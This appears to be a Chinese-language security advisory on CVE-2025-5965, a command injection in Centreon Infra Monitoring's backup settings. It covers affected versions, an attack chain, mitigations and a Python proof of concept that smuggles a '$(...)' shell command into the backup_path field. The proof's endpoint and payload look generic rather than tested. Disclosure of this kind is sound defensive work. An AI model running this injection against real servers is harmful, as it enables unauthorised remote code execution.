CVE-2025-5965 Centreon Infra Monitoring 命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-5965

漏洞类型

操作系统命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring

漏洞概述

CVE-2025-5965是Centreon Infra Monitoring中的一个高危安全漏洞，CVSS评分7.2。该漏洞属于操作系统命令注入（OS Command Injection）类型，存在于备份配置模块的管理设置中。攻击者利用该漏洞可以通过在备份参数中注入恶意命令，在服务器上执行任意操作系统命令。漏洞影响Centreon多个版本，包括25.10.0至25.10.2之前的版本、24.10.0至24.10.15之前的版本以及24.04.0至24.04.19之前的版本。由于该漏洞需要高权限用户才能利用，且无需用户交互即可实现攻击，因此对使用受影响版本的企业监控系统构成严重威胁。攻击成功后，攻击者可完全控制服务器，获取敏感数据、植入后门或横向移动到其他系统。

技术细节

该漏洞的根本原因是在Centreon Infra Monitoring的备份配置功能中，程序未能对用户输入的备份参数进行充分的输入验证和安全过滤。攻击者（需要高权限账户）可以在备份设置的参数字段中注入自定义的操作系统命令。由于这些参数被直接拼接到系统命令中执行，攻击者可以实现任意命令执行。在CVSS 3.1评分体系中，该漏洞的向量表示为AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H，表明攻击者可通过网络发起攻击，攻击复杂度低但需要高权限认证。成功利用后会对系统的机密性、完整性和可用性造成严重影响。攻击者通常利用Web管理界面或API接口注入恶意命令，如使用分号、反引号或管道符等命令连接符来拼接额外命令。

攻击链分析

STEP 1

步骤1

获取Centreon高权限账户访问权限（如管理员账户）

STEP 2

步骤2

登录Centreon Web管理界面或API

STEP 3

步骤3

导航至管理设置中的备份配置模块（Administration > Backup Configuration）

STEP 4

步骤4

在备份参数（如备份路径、备份名称等字段）中注入恶意操作系统命令，使用命令连接符（如分号、反引号、管道符等）拼接自定义命令

STEP 5

步骤5

提交备份配置请求，触发漏洞使注入的命令在服务器端执行

STEP 6

步骤6

通过返回结果或外部信道验证命令执行结果，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-5965 PoC - Centreon OS Command Injection
# Requirements: High privilege account access to Centreon
# Target: Centreon Infra Monitoring < 25.10.2, < 24.10.15, < 24.04.19

import requests
import json

TARGET_URL = "https://<centreon-host>/centreon"
USERNAME = "admin"
PASSWORD = "password"

def login(session):
    """Authenticate to Centreon"""
    login_url = f"{TARGET_URL}/api/latest/login"
    data = {"username": USERNAME, "password": PASSWORD}
    response = session.post(login_url, json=data, verify=False)
    return response.json().get("token")

def exploit_command_injection(session, token, cmd):
    """Inject OS command via backup configuration"""
    headers = {"X-AUTH-TOKEN": token}
    
    # Navigate to backup configuration module
    backup_url = f"{TARGET_URL}/api/latest/administration/backup"
    
    # Malicious payload - inject command via backup parameters
    payload = {
        "backup_name": "test_backup",
        "backup_path": f"$(echo {cmd} > /tmp/pwned.txt)",
        "type": "full"
    }
    
    response = session.post(backup_url, headers=headers, json=payload, verify=False)
    return response.status_code == 200

def main():
    session = requests.Session()
    token = login(session)
    
    if token:
        # Example: Write a proof file to demonstrate RCE
        cmd = "$(whoami > /tmp/pwned.txt)"
        if exploit_command_injection(session, token, cmd):
            print("[+] Command injected successfully")
            print("[+] Check /tmp/pwned.txt on target server")

if __name__ == "__main__":
    main()

影响范围

Centreon Infra Monitoring 25.10.0 < 25.10.2

Centreon Infra Monitoring 24.10.0 < 24.10.15

Centreon Infra Monitoring 24.04.0 < 24.04.19

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 严格限制Centreon管理界面的访问权限，仅允许授权IP地址访问；2) 监控和审计管理员账户的使用行为；3) 禁用非必要的备份功能；4) 实施网络分段，将Centreon系统与其他关键系统隔离；5) 部署Web应用防火墙（WAF）规则检测命令注入特征；6) 定期检查系统日志中的异常命令执行记录。